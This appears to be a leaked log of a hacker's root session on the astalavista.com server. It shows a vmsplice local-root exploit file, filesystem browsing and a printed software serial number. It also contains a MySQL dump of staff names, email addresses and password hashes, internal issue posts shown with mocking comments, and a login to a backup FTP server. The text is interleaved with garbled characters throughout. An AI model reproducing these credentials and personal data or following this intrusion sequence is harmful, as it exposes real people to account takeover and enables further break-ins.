- i" B+ q. S; s6 I9 kdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system- H; D! K$ Z$ O
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
" U% R# g3 }$ u-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout6 V- N% y7 v( ?7 ?( J+ ~
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
/ M0 ^& l( f" }& t) {1 G-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
5 l1 p) Y1 ^: bdrwx–x–x 3 com com 4096 Jan 29 2008 domains! O4 M) y0 y/ {* G- n0 \2 U) r
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
8 K- ~* e1 \! \* s, tdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap
, C [: C( A- ~/ ]-rw——- 1 com com 69 Nov 18 2008 .lesshst, H' l; `! y5 y4 B5 k! f
drwx—— 2 com com 4096 Sep 24 2007 mail
3 ]( ~4 j/ H- S/ J- I/ s-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
7 f) Q& k ]3 Y: x% j. p3 O2 s8 `drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp" t, D s' }4 ~
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
' Y8 a6 S7 J2 [) ^: a-rw-r—– 1 com mail 34 Sep 24 2007 .shadow! M$ }: C! k( M+ }
drwx—— 2 com com 4096 Aug 26 2008 .ssh7 ?" f3 S. d# Q) E8 k; j
-rwx—— 1 com com 8515 Feb 10 2008 t
6 f4 T( n# h: ~-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
3 @2 Y) J; R& h* t; edrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp7 p# b6 R. `; r; [
-rw-rw-r– 1 com com 617 May 20 2008 .toprc% `3 L2 [) G0 `; ?% `* \
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql- ^& I* B$ a9 G% R! I
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo& h6 D$ s& A( K& N1 `, w8 ]+ z
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
' l6 x9 s* Y# l
[3 f/ f$ t6 t. u5 Csh-3.2# head t.c" P. R0 ]. F1 {* w
/*
: ]+ s! h, O2 ]9 i8 r: S: W* jessica_biel_naked_in_my_bed.c+ E* v% @. i D8 K. x( k a
*9 d5 F0 ^& ^" K' n- i; Q# C1 `1 K
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.! N ^( m9 T& M2 ?$ ]. t* c: G
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.3 F9 [. ?9 C6 W/ }
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
+ |! G8 p% I8 A& B4 S) k*( I7 z* B q" s" d/ e
* Linux vmsplice Local Root Exploit
. N2 N4 j7 @ l. i, S' N* By qaaz
# w% B( A$ }3 K3 X*6 ]- e* D5 T: n l
4 q% I6 G- E0 N& i
sh-3.2# cd /
) }# `0 `, b" y" j! Gsh-3.2# ls -la. ~) H# _) z$ Z( @/ I
total 360& {* q. g- @: j+ v* r2 u3 U( K
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
8 ?2 h- C# _$ u" h' Qdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
( t* k0 o7 o# J# }$ f) M-rw——- 1 root root 10240 Jun 3 02:39 aquota.group# h3 w8 _6 A9 W. z) R" {; ^+ O
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user6 a0 \2 @6 p5 j8 ~
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db# t! l1 s c& y5 i
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
) e! r% b, Y' w& C5 p5 |# z; r. D3 A: h-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel' x! G0 e$ _# c& I
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup7 G, }' X3 L6 b, a2 A5 {" ]* ?
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin1 U% i4 B# e2 B: H
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
; q. Q$ `9 n e, [/ k1 Jdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev) c$ h. ?/ t/ c7 Q# N! x
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc( c( G4 p2 T/ E
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
" M4 a) i; Z3 i2 G! C) K-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
! L5 }1 g; H3 `' ldrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib- b) L8 p! m& U. b
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
2 K r: j8 j3 Q# V ^2 J2 d0 t/ W1 i5 ?drwx—— 2 root root 16384 Sep 11 2007 lost+found
, T8 i% W. D- R. [, y2 E6 h8 D7 r& X! Zdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
$ v7 M/ _" ^" T7 B5 ~- H) Z2 idrwxr-xr-x 2 root root 0 Jun 3 02:43 misc. f/ ~" S O9 ~7 o1 ~% A
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
: u: h- `2 X! O, U4 i-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
/ t* G. L% `) i9 D$ Wdrwxr-xr-x 2 root root 0 Jun 3 02:43 net
5 ^( a$ a$ J0 X3 u) o. z8 ^drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt5 z" i& g. u# m! y: N
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc7 u3 ~! a0 i) }% j' r
drwxr-x— 15 root root 4096 Jun 4 08:40 root5 u& j# p& U8 z/ u" L) b* }6 f
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
U0 e j: _' h2 z" c7 l3 idrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
9 s7 F2 n7 j* \# \drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
. M; n. b8 I- a2 u: r3 v* rdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys7 }4 m/ ?& W. F$ m c- e! L; D
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
7 a. F# O" y5 S! W, n8 x/ _3 U9 Gdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr2 Q$ m. I/ Y$ Z8 c+ m5 w. o2 |, f
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var3 ?" }5 T0 o/ `' q
3 |7 I4 i* C# Z3 j. nsh-3.2# cd opt" {& E) p1 |' J! h- A
sh-3.2# ls -la
5 l" {3 j7 J9 q1 K& }1 Qtotal 20
0 ~( S+ M! L4 g. ~5 `; b" Ndrwxr-xr-x 3 root root 4096 Mar 11 17:56 .$ j" W4 [, ^6 h6 F0 L' T8 q, t4 j% D
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..2 d0 f1 {: M0 |# G2 y
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
6 G# ~2 p. n" W) e) C. u" J# C' D; g, E$ C% R4 M
sh-3.2# cd lsws/. C) }& i; M; u: n8 l2 k
sh-3.2# ls -la
( n# O1 J1 P6 `$ h4 Itotal 108
, U- d- Y8 h) o4 y9 T( jdrwxr-xr-x 15 root root 4096 Mar 20 2008 .
& C { e1 }2 T7 @" N5 Adrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
2 T b! j7 h1 q; A0 xdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
/ A$ e' E) T6 I' D9 l8 _) kdrwxr-xr-x 13 root root 4096 May 29 15:10 admin
/ D: E }! A' s0 B2 Z* k$ K" @drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate; ?% E0 L/ Z1 P. x$ ^$ {
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
2 p+ f: G4 A0 ndrwx—— 4 apache apache 4096 Jun 3 02:43 conf
' g$ | _+ F( x1 d1 Y: udrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT& E4 b& }7 [, |8 B& Q, ~" ~) `8 s9 c
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs: T( d) K- T/ D. {; a% i+ l2 Z. _* H
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
# j3 ~/ A& T/ w& O* c- m8 tdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib4 }0 F7 F9 H( \+ P
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
' E% @+ x0 Z9 S9 {4 C- I6 C-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
1 |5 I. x4 v) _ h" K0 Q C-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL+ {. j- B) K* J4 q# V! B. z
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP+ [/ b& J" E/ w8 ]. p
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs7 E o# J& s3 ?2 F0 U" k0 J
drwxr-xr-x 2 root root 4096 Mar 20 2008 php
1 h5 @! _0 o8 ~) ldrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild& U% q# X3 I. M' K- C' v
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
4 b4 Q" G a" C% [$ o0 T-rw-r–r– 1 root root 6 May 29 15:10 VERSION$ B0 F6 u. r$ f: B$ G9 t
8 O/ Q9 n! q# A1 T; w* f3 g
sh-3.2# cd conf- G! _$ J- c: M" B8 ^
sh-3.2# ls -la
% S3 P3 |% |+ t& h9 m+ S5 ptotal 48
& Y3 |/ Y& }' a: vdrwx—— 4 apache apache 4096 Jun 3 02:43 .
6 j6 }# Z. {( T' w- e9 {drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
' O5 w$ H( l7 M% s( o3 h" w+ Ndrwx—— 2 apache apache 4096 Mar 20 2008 cert: e$ @3 f: w* M1 b3 H. D8 `: ^
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml: L F) g4 c2 w: y0 h6 b+ a. `
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
- f- r+ `" j7 Y* V7 k2 j* I-rw-r–r– 1 root apache 0 Jun 3 14:11 .last" V! N) X$ _5 G: B" e9 x6 p
-rw——- 1 apache apache 256 May 29 15:10 license.key
2 M: b. a3 S8 y, R0 ~! O-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
- ]' T9 P8 a' X F) V) Q-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties. B& L9 m5 k2 I/ i
-rw——- 1 apache apache 20 May 29 15:10 serial.no, x% S: B* r7 k1 j& L0 D
drwx—— 2 apache apache 4096 Mar 20 2008 templates4 Y8 W- f" s. P& k2 _5 r
( F% [( E% u4 c: M3 s% t
sh-3.2# cat serial.no
. v! o8 z4 m, W2 N( ]/ N$ hIbDl-oVsO-CKqL-wVRa) ]1 T' D9 H1 s$ y" a) k
7 M( w3 S( I, L* c6 t8 ssh-3.2# mysql) F6 P8 r- w, k& _
Welcome to the MySQL monitor. Commands end with ; or \g.1 D& l# [. B6 b; P. ?" R5 T. W
Your MySQL connection id is 286844
" X* o6 Q1 S/ ?/ w: J- ~Server version: 5.0.45-community-log MySQL Community Edition (GPL)' @' p6 F% [2 H& ]
9 ]8 i A8 D+ N6 hType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer." r6 ~$ Y+ W4 s3 U& I1 R
( k+ Z$ G: j5 X, e' Emysql> show databases;
8 u1 n: k6 L9 e" n+———————–+
- C" d2 h. ^; k/ e& E| Database |
0 n* ?# z2 n( n; j# _% \4 t+———————–+
5 G9 Q, r$ e& |/ k, Q| information_schema |
% i4 Y5 F, [( [6 b| astanet_ads |$ q# l6 K" d# p6 p0 f# Q
| astanet_mailing_lists |
8 n- D5 ]( P' n4 U1 [* G4 N6 C: y6 Z| astanet_mediawiki |2 x+ A; L) l5 a
| astanet_membersystem | w2 F2 `) N+ G* m
| com_contrexx |! C" M1 K e. H# j
| com_contrexx2 |
" O" J3 f$ ]0 a3 r o6 ~4 ~/ h7 Q| com_contrexx2_live |
+ q( X3 ~3 ^8 v3 ~| da_roundcube |- } ^0 e$ o$ R
| dolphin |
$ ~, p0 R6 D3 n0 [| ideapool |( ?5 l, x3 u4 \3 K0 @
| mysql |2 `! ?4 ?1 g$ B; [' @
| test |- d# a, n Q l$ D0 ~
| yourmaster |6 S* n. E0 i9 J, y8 o! \& Q" t
+———————–+
1 }# n T- Q; ?* K" N) v+ J9 H14 rows in set (0.00 sec) }% k+ |2 N$ Q1 V
" E5 i+ o N+ R4 J1 p+ b- q6 c+ @8 Hmysql> use ideapool
1 e/ M! b4 }/ d" @& A$ q6 ?& PDatabase changed
; x& g$ T7 U1 j& _. K6 a! amysql> show tables;
3 Z3 G. g2 M# [( Q7 L+ t$ Y+———————————–+
8 O- m- v" y, O2 _- K! i, g| Tables_in_ideapool |- p3 c# t; u Q2 B
+———————————–+' I5 j$ T8 G1 a6 u; C& D
| eventum_columns_to_display |1 i) `9 E0 v% y" A5 K
| eventum_custom_field |
/ m& r3 I, n& C# F0 h| eventum_custom_field_option |3 D5 M, b y+ K
| eventum_custom_filter |- m; _6 u/ X' b' T
| eventum_customer_account_manager |
! U4 M3 [1 O6 j) S8 K: [ f# D| eventum_customer_note |- S% z: a+ k& o
| eventum_email_account |2 [7 D: f" V8 {( P p- f+ O1 k A
| eventum_email_draft |
5 U7 p$ G* f- l) F| eventum_email_draft_recipient |
. {. P; ]( D E4 `! r. z- k| eventum_email_response |
& N- }* W/ E% q6 d x4 I6 L| eventum_faq |
& X+ R0 W" B( }$ K) N" f+ \! G W4 |5 e| eventum_faq_support_level |
; t/ ^. a& E$ \% r4 f| eventum_group |
& v0 S: L, t& T/ Y( J) O| eventum_history_type |
+ r- f6 Z4 V0 i| eventum_irc_notice |
# v& g& W; e r- d7 @* t- M1 }& V| eventum_issue |
5 _: j- g4 p- C# V! @. O| eventum_issue_association |
. {2 j5 w0 l: [3 ?/ C( f g& x3 v5 n| eventum_issue_attachment |
: R- E+ z; k6 n+ [; ?| eventum_issue_attachment_file |
- u; T/ f+ T2 y! J' N- q9 s2 t9 x| eventum_issue_checkin |! @8 ]$ T7 N* ]- M1 G- m! B
| eventum_issue_custom_field |
' b$ f }* V' P4 J3 r| eventum_issue_history |- h7 n; n2 Z. a) Z3 d) R9 U L1 x
| eventum_issue_quarantine |7 k0 l! Q- F! X; [ P9 C, V+ k
| eventum_issue_requirement |) J' `; n/ _( ?, s" s/ D
| eventum_issue_user |
% E0 b7 q. l+ ?& _$ m1 w| eventum_issue_user_replier |; b% O+ J# M4 [7 V( W) R
| eventum_link_filter |+ J# p( L* j# Z% ~! W0 ]# @
| eventum_mail_queue |
2 u' q6 W e! [" a4 _3 P| eventum_mail_queue_log |
* a5 m& F: z& e9 Q& P" u% L' Q| eventum_news |
! U6 O: O1 O! v+ Y. }8 H| eventum_note |
" ? n# \5 }) M! [| eventum_phone_support |1 q t5 |, m/ q3 Q' [0 u
| eventum_project |7 [' D7 c$ P7 m
| eventum_project_category |
* a2 T) X/ z0 _| eventum_project_custom_field |) `' r; s6 M9 l0 t7 l0 t9 G
| eventum_project_email_response |
: l. o' ]4 R) C' C; l; x$ \* e| eventum_project_field_display |0 _: L! X, n& p& k
| eventum_project_group |
/ X* x/ Y d' m3 G8 A2 b B| eventum_project_link_filter |
9 D/ H6 Y$ o* v C6 P| eventum_project_news |$ d0 x6 Q! r$ e' C
| eventum_project_phone_category |
8 z( \" ?+ e1 I* Q# I0 o- M| eventum_project_priority |
4 e g9 B9 \6 r" C, Y; b' W| eventum_project_release |
9 H5 X# f" V& D& _% M| eventum_project_round_robin |
% _2 T8 V+ @# v1 K- T: V# t5 `| eventum_project_status |& _, U! C0 o) \$ L5 e8 d
| eventum_project_status_date |
; z& x8 k. y' I9 q( `| eventum_project_user |
4 {2 s6 v3 I/ l2 W& x% u| eventum_reminder_action |
3 @$ P* F( B! }9 }- G+ G( Q| eventum_reminder_action_list |" I6 l% V* x# m- e% Z
| eventum_reminder_action_type |7 ]: N- K" l" M2 R! G6 R0 B
| eventum_reminder_field |3 A+ W3 b) X k
| eventum_reminder_history |* e6 d2 d) Q4 c4 l
| eventum_reminder_level |
7 W" S( _2 H5 `) J* s" b| eventum_reminder_level_condition |
8 a E \: ~5 A6 G$ z| eventum_reminder_operator |
& E E2 ]* K7 O, X2 K! ?$ s; S| eventum_reminder_priority |1 P$ d @2 `5 j8 K
| eventum_reminder_requirement |
" r, _$ T, ^$ Z) K0 o3 f/ M| eventum_reminder_triggered_action |+ w' t9 `( ~2 u" n
| eventum_resolution |. n* |7 h9 R! M8 g
| eventum_round_robin_user |
2 N! m4 Z( j, S+ n| eventum_search_profile |% I4 S2 [# S! b: I/ f4 Z$ B
| eventum_status |
6 a1 D4 R+ I$ A& ^0 w5 ?| eventum_subscription |4 B+ j& M4 t C+ H
| eventum_subscription_type |0 g7 F k2 H5 O% k
| eventum_support_email |" v& H, @ S! i- g: }; P
| eventum_support_email_body |4 [' j3 P4 L, x' K: k' ?
| eventum_time_tracking |4 I. L2 P1 ^! _1 z; J" c! S
| eventum_time_tracking_category |/ o- ?% _) h* q* W. g q, {$ R
| eventum_user |" _' ^4 T3 q5 P
+———————————–+- m( ~# r& C# c9 w
69 rows in set (0.00 sec)
) F& L9 k5 X. n3 n7 L3 }
* h! j8 O" {& A1 o# [3 b/ U) u" Umysql> describe eventum_user;
( j& y5 r$ L( K1 S+ P+————————-+——————+——+—–+———————+—————-+
7 B G* n6 p4 j" g+ r' ^/ K" m3 W5 I| Field | Type | Null | Key | Default | Extra |1 `% l/ H3 h: I% K) X# |) T! P
+————————-+——————+——+—–+———————+—————-+
7 ~) f7 G5 s+ W. `7 d| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |( B9 O9 @' k3 |9 S2 p2 p: X4 @
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
/ Q6 G' S2 `" K3 ~| usr_customer_id | int(11) unsigned | YES | | NULL | |
, N9 d$ N/ M, L) O% ]| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |# _# b. z& L3 m" \8 E7 E* l
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |) a" d `$ t7 C4 `: d( w
| usr_status | varchar(8) | NO | | active | |: Z' w$ d8 A7 L
| usr_password | varchar(32) | NO | | | |
+ ]( l4 E% m* ]& U( d2 N| usr_full_name | varchar(255) | NO | | | |# f3 J1 ^: Z4 y* K9 B
| usr_email | varchar(255) | NO | UNI | | |2 {2 v7 X0 A7 u% S4 c5 _- s3 V7 T
| usr_preferences | longtext | YES | | NULL | |/ J4 y. `+ {* B& G+ Y7 O1 Y2 e
| usr_sms_email | varchar(255) | YES | | NULL | |: z- k7 @+ X; _/ a6 t" C
| usr_clocked_in | tinyint(1) | YES | | 0 | |
% h- ^6 O; `" m/ }9 s| usr_lang | varchar(5) | YES | | NULL | |
9 v& R2 t d, ?4 E. Z6 J+————————-+——————+——+—–+———————+—————-+" w; H6 p& p8 v. t0 g. y
13 rows in set (0.00 sec)
1 r' r6 A) x% c& T, |+ i/ Z3 y/ G p
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
: f& J+ Z* c$ ^) d+———————-+——————————-+———————————-+
3 B3 N* {; Y3 [5 s) p| usr_full_name | usr_email | usr_password |
1 x; o4 \) H+ d8 f. u' G$ K+———————-+——————————-+———————————-+
4 K% P* W. w3 ^4 @! g6 \4 p- @| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |0 c2 R4 T2 a7 k8 Z
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |0 Q3 Q8 q. i3 C3 r& t
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
: G8 G; c: h) M. T| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
8 g& E6 d4 Q. F1 @- W| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
T8 Z0 b1 f1 D| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
; [3 b% L9 p4 l" y| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |- N, f/ @* ]; c+ m, b* h
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
: U+ W! ?# a1 c( y4 y0 p| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
% C# q& A S L: u; z. B| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |" w: F' I$ B: l9 Q2 m
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
. J6 Q# u$ U! Q' H. @| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
6 n+ V$ Y( C ?' Q* Q| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
m. Q; r M3 h! u- q4 M| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |$ z/ ?- E9 `8 G, H" R" {
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |7 k4 s' U8 s- v7 h
+———————-+——————————-+———————————-+% E* z: P0 M& n8 g$ Y; _
15 rows in set (0.00 sec)
9 E6 g* j$ E- Z( D2 E, V: t5 r) E( z0 t$ n/ p1 Z
mysql> select iss_description from eventum_issue where iss_id = 43;
/ i, t3 D7 j, _( T' X+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+; s. j; J: e' Y9 F. ?
| iss_description / |% O0 t; Y5 q# E% p1 n) K
|' x, G4 r: \5 R* C8 V m
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
$ s0 ]. Y4 o9 l| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
+ W. Q. c1 O" @/ qconnected for 90 mins… 120mins… so what i propose is something like:
3 l) s' z" F# x R链接标记[url]http://www.surfthechannel.com/[/url]
5 @7 P) [9 k& G6 r: Hsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system; X E( d! S3 d; K- o/ _
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t+ M/ ~& X% E( `6 q$ L2 O8 z& P
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
9 w, D. M* c* Y; c/ n/ r$ r; Gif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…! K" d' u, ^0 z
- v* V) @* T. C* MWe could also put advertisement during play on the flash video player itself… extra $$…$ @5 D) b5 C' ?5 X/ C- a
6 G: k8 w3 f- a" y' f" T
By sykadul |
% ^5 I" o$ }' i H5 R- ^+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+9 D3 d, m# ]9 w5 F/ f
1 row in set (0.00 sec)$ `1 @5 L* d6 i& l- M: }
' z0 x& K! O( s6 A! l
// Money and extra $$ is all they care about. remember that.
, O; q% L' i- { o5 i9 V8 ~$ g# o" h7 H
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;' K2 r7 T' v. c- M* E, c# D+ q
+————————+——————————————————————————————————————————————————————————————————————————————-+
2 s. U) E; {2 Y6 a4 m| iss_summary | iss_description + Q- I" n' S! p5 i* U
|
2 E$ i2 D& D; s7 v, {+————————+——————————————————————————————————————————————————————————————————————————————-+. a2 F3 B2 m3 h* S! b5 Q
| Forum for REAL EXPERTS | Hello," \9 ?$ z; L2 V" r
1 a; {) ?- D5 T3 P! x, AIshtus and I,
: ~/ D. B3 Z) [1 l5 f4 o* s! x* l+ ^" A( { X& S3 G' q
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide( B9 V; Z+ S# B' ~- B0 d, K) i9 W* X
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..( B/ X0 M) s* V( o# u5 I) P. n, {# ^4 I
* Z# d8 m6 D0 z: t) QOne example a friend of mine from coresecurity.com!8 b+ b- {) W1 Y! Q" J! U0 F; j
5 h) j' w& F( i3 D" V& @% gWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
& `9 |1 ?8 k! V$ j, Y
- i3 m" U! p6 C5 H- b|; ~- k: d1 ^! _) f
+————————+——————————————————————————————————————————————————————————————————————————————+. I# B9 p, A3 g5 R
1 row in set (0.00 sec)5 O# R$ O5 s7 `& j! J$ _# E; N/ f
# I/ p, J! t4 i0 U) { |& y
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…+ x, I2 R- T0 J8 f8 E
$ o3 M& T/ N" D; S7 m8 l& R0 c
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;5 g# L3 j& m4 W5 \% R
+——————+———————————————————————————————+. O- W& Y5 q: S1 l
| iss_summary | iss_description |/ z4 g8 p3 d3 r2 x0 c
+——————+———————————————————————————————+
6 W7 N& C* Q' _: l, q| Website guidance | Virtual Girl which guides you trought the website.
6 }% _! r( b6 |$ S. G; U7 d8 s) [+ z. L
We need a girl with who you can ( talk )!!!
5 t) e6 y6 S1 m6 kAlso for the News!! p% m9 z3 n4 ~
So my suggestion is a girl who read you the news loud if you like!( e! p. F& d2 Z1 D/ ?
you can choose between read yourselfe or she read it for you or both!
& Z# [# g+ V% X" N- P8 B. M
& y1 y; z5 k# f7 j* kGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
% q9 Q l5 P7 p
: f t* m4 S0 qHave a look on the example girls!!/ y/ h4 |7 P; i" C" `9 ]6 I) L. y8 M
$ K' x/ t1 z2 b% b& Z+ e8 t! v
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]: V$ k; z9 N8 v7 D. A
8 A% |( @# M: }; a9 U
or that; K4 V/ R7 m8 |( {
2 u( T7 s/ U6 v; q6 |, R1 @5 x& {
链接标记[url]http://www.yellostrom.de/[/url]
$ M; n7 \3 u5 s! B z" ^( J# w
; S& a" [& r5 |, c, \$ j$ o|
2 m2 i" t( ]8 @% c! s- s, y+——————+———————————————————————————————+/ m r) Q) \) K& ^% O8 G$ A" n7 p$ O
1 row in set (0.00 sec)3 i5 j9 e# L3 G, E
, w' w+ G7 }- S4 G/ s// ha ha.
" c4 p1 o, p) Y2 k' h# ]: q+ Q5 C O: p2 u/ O, C" Y' l6 B }
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;4 g o9 s2 H; X" R1 b/ I
+————————–+———————————————————————————————————–+
' @8 R! ]5 \% g/ i0 [$ @| iss_summary | iss_description |
- j; g; G6 l4 D! C/ X; A7 a2 Y+————————–+———————————————————————————————————–+, R9 g: E+ T8 E0 n9 E* t( `
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |6 F! h4 d: [" N; ]5 h6 [' G
+————————–+———————————————————————————————————–+/ @' X) }- L. z8 \7 Y, z/ ?9 ?
1 row in set (0.00 sec)
" w- o9 o: x8 w4 H, N: g+ L9 f- e! k, `; |2 P5 Z1 P9 O0 G; s
// LOL.3 o: [- B! _" m) C2 s ?) J
5 [. d8 @4 D' ymysql> exit6 q& I0 b4 V }! J, S/ m
Bye
/ W( @. q9 n* u5 u& a A* f6 a# y1 c* L& Z4 U( `
sh-3.2# ftp 212.254.194.163! f" A& T9 ^6 J$ q* A
Connected to 212.254.194.163.
: ]2 K8 F5 x# U/ m6 D! v220 BackupCOM_VW FTP server ready.
+ F. {; f! c9 ]' D* }$ x504 AUTH: security mechanism ‘GSSAPI’ not supported.4 N! B0 U! L+ ]* P
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.( y$ M; W7 F6 [" P& ?* J% `4 B% p
KERBEROS_V4 rejected as an authentication type
4 d! r. A7 S# q; x& q' B4 M! d: eName (212.254.194.163:root): astalavista.com
$ k6 ?: ]6 O! n0 k, y: a( a1 F! P0 J331 Password required for astalavista.com.
6 u& d' _, |" F3 R3 GPassword:) M" ]" b/ z8 P7 Z9 \7 N' g3 d& Y
230 User astalavista.com logged in.
7 m8 o0 n) u) g) b+ K$ E& ?' QRemote system type is UNIX.
u9 g2 H- M* ?8 L% U- d( lUsing binary mode to transfer files." _+ J* G4 B+ F, j% V; Y
ftp> ls -la7 m6 ~$ f9 Y$ Q E) @9 T
227 Entering Passive Mode (212,254,194,163,2,188)
1 ?7 k/ {" H( w% n) P/ D150 Opening BINARY mode data connection for ‘file list’.
0 }+ T( M- A8 U& S/ H* Z N* Zdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
4 O) C9 A/ F# l; N5 i226 Transfer complete.1 ]* D j# M8 r# x7 \& u# E7 c9 r7 W
ftp> cd astalavista.com8 v* _9 i! h- y# v- G2 T2 u+ T
250 CWD command successful.
, ~) g. k% A% E5 ~* N. vftp> ls -la) U6 _* C8 k5 ~9 _9 g
227 Entering Passive Mode (212,254,194,163,2,189)/ \3 ?9 a* ?' _( L7 }/ u
150 Opening BINARY mode data connection for ‘file list’.
- z# k( S) }6 W, K$ i-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
